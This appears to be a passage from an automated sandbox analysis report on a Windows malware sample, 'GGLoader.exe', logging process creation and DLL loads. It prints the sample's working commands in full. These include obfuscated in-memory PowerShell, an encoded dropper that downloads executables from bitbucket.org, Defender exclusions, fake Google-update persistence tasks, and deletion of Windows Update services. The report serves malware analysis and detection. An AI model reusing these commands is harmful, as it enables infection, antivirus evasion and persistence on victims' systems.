$_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>; Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
